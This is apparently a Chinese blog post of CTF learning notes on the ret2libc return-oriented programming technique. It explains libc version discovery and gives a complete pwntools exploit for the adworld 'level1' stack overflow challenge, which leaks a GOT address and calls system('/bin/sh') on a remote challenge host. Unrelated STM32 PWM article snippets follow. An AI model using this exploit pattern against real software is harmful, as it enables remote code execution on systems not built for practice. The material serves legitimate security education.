【pwn】ROP--retlibc

最新推荐文章于 2025-09-17 22:48:42 发布
原创 最新推荐文章于 2025-09-17 22:48:42 发布 · 794 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#rop基础

本文分享了ROP中retlibc技术的学习心得,介绍了通过不同方法泄露库函数地址以获取libc版本的技巧,包括使用libcsearcher库、pwntools的Dynelf模块及在线查询网站。并以adworld level1为例,详细解析了如何利用这些信息实现远程代码执行。

ROP中对retlibc技术的一些学习心得

漏洞利用思路:

1.找到泄露库函数地址的漏洞,获取libc版本(因为一般不会给你libc.so文件)

查询libc版本一般有三种方法:
1.libcsearcher库。在编写exp的时候用from LibcSearcher import LibcSearcher导入
通过libc.dump('system')可以得到system函数的偏移,libc.dump('str_bin_sh')得到binsh字符串的偏移
2.pwntools自带的Dynelf,需要先构造一个leak函数和一个可以不断触发溢出的漏洞

一个模板:

def leak(address):


  #各种预处理


  payload = "xxxxxxxx" + address + "xxxxxxxx"


  p.send(payload)


  #各种处理


  data = p.recv(4)


  log.debug("%#x => %s" % (address, (data or '').encode('hex')))


  return data


d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块 


systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

	3.在线查询网站,通过函数的后三位数值查询。https://libc.blukat.me

典型的题目–adworld里的level1(非常典型的retlibc)

源码:

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  printf("What's this:%p?\n", &buf);			
  return read(0, &buf, 0x100u);		//溢出点
}

exp:

from pwn import *

from LibcSearcher import LibcSearcher

context.log_level='debug'

#sh = process('./level1')
sh=remote('111.198.29.45',42536)

writeplt= 0x08048370
readgot=0x0804A00C
vuln=0x0804847B



payload = 'a'*0x8c+p32(writeplt)+p32(vuln)+p32(1)+p32(readgot)+p32(4)

#gdb.attach(sh)
sh.sendline(payload)

readaddr=u32(sh.recv(4))
print(hex(readaddr))
libc = LibcSearcher('read', readaddr)
libcbase = readaddr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
payload='a'*0x8c+p32(system_addr)+'a'*4+p32(binsh_addr)
sh.sendline(payload)




sh.interactive()

sh.close()

笔记:

context.log_level='debug’开启调试模式

STM32通用定时器-输出比较(生成PWM
qq_1033275663的博客
11-22 3855
PWM(脉冲宽度调制)是一种用于控制电子设备的技术。它通过调整信号的脉冲宽度来控制电压的平均值。PWM常用于调节电机速度、控制LED亮度、产生模拟信号等应用。
第六篇,STM32脉冲宽度调制(PWM)编程
weixin_44651073的博客
07-03 8917
STM32脉冲宽度调制(PWM)编程
STM32开发(TIM定时器:通用定时器 - PWM
最新发布
weixin_65849806的博客
09-17 733
1、准备工作:1.由RCC产生并分配给TIM一个分频前的时钟频率CK_PSC = 160MHz2.设置分频寄存器PSC = 160,分频后时钟频率CK_CNT = 1MHz3.设置自动重载寄存器ARR = 10004.设置计数器的计数方式为递增计数5.设置捕获/比较的值CCR1 = 7002、自动重载寄存器ARR中的值会被加载到计数器CNT中3、计数器CNT以0为起始值计数,每经过一个时钟周期,计数器的值就加1。
STM32学习之PWM输出
m0_65292176的博客
05-17 854
STM32PWM输出,并通过PWM输出驱动蜂鸣器进行理解。
STM32输出PWM
m0_59066136的博客
10-29 3640
使用TIM3和TIM4,分别输出一个PWM形,PWM的占空比随时间变化,去驱动你外接的一个LED以及最小开发板上已焊接的LED(固定接在 PC13 GPIO端口),实现2个 LED呼吸灯的效果。
STM32 PWM输出
m0_62005595的博客
12-10 2574
STM32 PWM输出
PWM.zip_STM32 舵机_bottomzxe_stm32 pwm_stm32舵机_stm32输出PWM
09-23
在这个压缩包“PWM.zip”中,可能包含了示例代码、配置文件、库函数等,帮助开发者更好地理解并实现STM32输出PWM控制舵机的功能。通过深入学习和实践这些资料,开发者可以熟练掌握STM32在舵机控制中的应用,进一步...
stm32输出pwm
07-20
在标题“stm32输出pwm”中,我们关注的是如何使用STM32F103单片机来生成脉宽调制(PWM)信号。 PWM是一种模拟控制技术,通过调整数字信号的高电平时间比例来改变信号的平均电压,从而实现对模拟信号的控制。在...
stm32 输出PWM占空比可由串口控制
04-28
总的来说,通过STM32的串口接口和PWM功能,我们可以实现远程控制设备的输出特性。这在各种应用中都很有用,例如在无人系统、自动化设备或智能硬件中,通过无线或有线通信调整设备的运行参数。理解并熟练掌握STM32的...
STM32输出PWM控制180°舵机
KINO32的博客
02-08 3130
(1)脉冲宽度调制(2)占空比:高电平时间占整个周期时间的比例(3)STM32通过定时器实现PWM时具有两种模式PWM1模式:向上计数模式下,CNT当前计数寄存器的值小于CCR比较寄存器的值时输出有效电平,大于时输出无效电平,向下计数模式下,CNT当前计数寄存器的值小于CCR比较寄存器的值时输出无效电平,大于时输出有效电平。
stm32PWM输出程序
03-16
stm32PWM输出程序
stm32pwm输出
weixin_46098612的博客
04-11 1万+
1.定义 脉冲宽度调制(PWM),是英文“Pulse Width Modulation”的缩写,简称脉宽调制,是利用微处理器的数字输出来对模拟电路进行控制的一种非常有效的技术,广泛应用在从测量、通信到功率控制与变换的许多领域中。 2.输出来源 以TIM3为例,STM32的通用定时器氛围TIM2,TIM3,TIM4,TIM5,每个定时器都有独立的四个通道可以用来作为: 输入捕获,输出比较,PWM输出,单脉冲模式输出等。 STM32的定时器除了TIM6和TIM7(基本定时器)之外,其他的定时器都可以产生PWM
STM32输出PWM
2201_75294784的博客
07-18 1340
stm32输出PWM形是靠定时器实现的,通过比较CNT和CCR的值实现对输出电平置1或者置0以及反转的效果,用于输出一定频率和占空比的PWM形。定时器输出比较基本框图如图红框内所示,每个定时器有四个输出单元,这四个输出单元有相对应的GPIO口,想要输出PWM,只能在相对应的GPIO口输出,以下是引脚定义图。
STM32——PWM输出
m0_74225397的博客
08-15 4276
可以看到:定时器除了基本的定时中断功能,输入捕获、输出比较均是STM32定时器的功能。
STM32单片机-PWM输出
热门推荐
让你爱上电路设计
05-09 1万+
本文详细介绍了STM32中定时器的种类、引脚映像与寄存器设置,特别是定时器时钟分割和PWM产生原理。通过实例展示了如何配置定时器3的通道2作为PWM输出,包括IO口操作、定时器初始化、PWM模式设置以及占空比的调整。通过修改TIM3_CCR2寄存器的值可以改变PWM的占空比,从而实现不同频率和占空比的PWM输出
STM32PWM输出
DevFrank的博客
10-24 3752
PWM输出学习。
stm32输出 pwm
08-31
要在 STM32输出 PWM ,你需要执行以下步骤: 1. 设置引脚为 PWM 模式:选择一个支持 PWM 输出的引脚,并将其配置为复用功能。具体的引脚和配置方法取决于你使用的 STM32 型号和开发环境。通常,你可以使用 GPIO 初始化函数来设置引脚功能。 2. 配置定时器:选择一个可用的定时器,并设置它的时钟源、预分频因子和计数器周期。这些设置将决定 PWM 的频率和分辨率。你可以使用定时器初始化函数来完成这些配置。 3. 配置 PWM 通道:选择一个通道,并设置其比较值和工作模式。比较值决定了 PWM 的占空比。工作模式可以是输出比较模式或输入捕获模式,具体取决于你的需求。你可以使用 PWM 初始化函数来配置 PWM 通道。 4. 启动定时器和 PWM 输出:启动定时器以开始计数,并使能 PWM 输出。你可以使用相应的函数来实现这些操作。 下面是一个简单的示例代码,演示如何在 STM32输出 PWM : ```c #include "stm32f4xx.h" void PWM_Config(void) { GPIO_InitTypeDef GPIO_InitStructure; TIM_TimeBaseInitTypeDef TIM_TimeBaseStructure; TIM_OCInitTypeDef TIM_OCInitStructure; // 使能定时器时钟 RCC_APB1PeriphClockCmd(RCC_APB1Periph_TIMX, ENABLE); // 使能引脚时钟 RCC_AHB1PeriphClockCmd(RCC_AHB1Periph_GPIOX, ENABLE); // 配置引脚为复用功能 GPIO_InitStructure.GPIO_Pin = GPIO_Pin_X; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_AF; GPIO_InitStructure.GPIO_OType = GPIO_OType_PP; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_100MHz; GPIO_Init(GPIOX, &GPIO_InitStructure); // 配置引脚复用映射 GPIO_PinAFConfig(GPIOX, GPIO_PinSourceX, GPIO_AF_TIMX); // 配置定时器基本参数 TIM_TimeBaseStructure.TIM_Period = PeriodValue; TIM_TimeBaseStructure.TIM_Prescaler = PrescalerValue; TIM_TimeBaseStructure.TIM_ClockDivision = TIM_CKD_DIV1; TIM_TimeBaseStructure.TIM_CounterMode = TIM_CounterMode_Up; TIM_TimeBaseInit(TIMX, &TIM_TimeBaseStructure); // 配置 PWM 模式 TIM_OCInitStructure.TIM_OCMode = TIM_OCMode_PWM1; TIM_OCInitStructure.TIM_OutputState = TIM_OutputState_Enable; TIM_OCInitStructure.TIM_OCPolarity = TIM_OCPolarity_High; TIM_OCInitStructure.TIM_Pulse = PulseValue; TIM_OCXInit(TIMX, &TIM_OCInitStructure); // 启动定时器和 PWM 输出 TIM_Cmd(TIMX, ENABLE); TIM_CtrlPWMOutputs(TIMX, ENABLE); } int main(void) { // 初始化相关硬件和外设 // 配置 PWM PWM_Config(); while (1) { // 执行其他任务 } } ``` 请根据你的具体需求修改代码中的参数和引脚配置。这只是一个简单示例,你可能需要根据你的应用场景进行更多的配置和调整。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值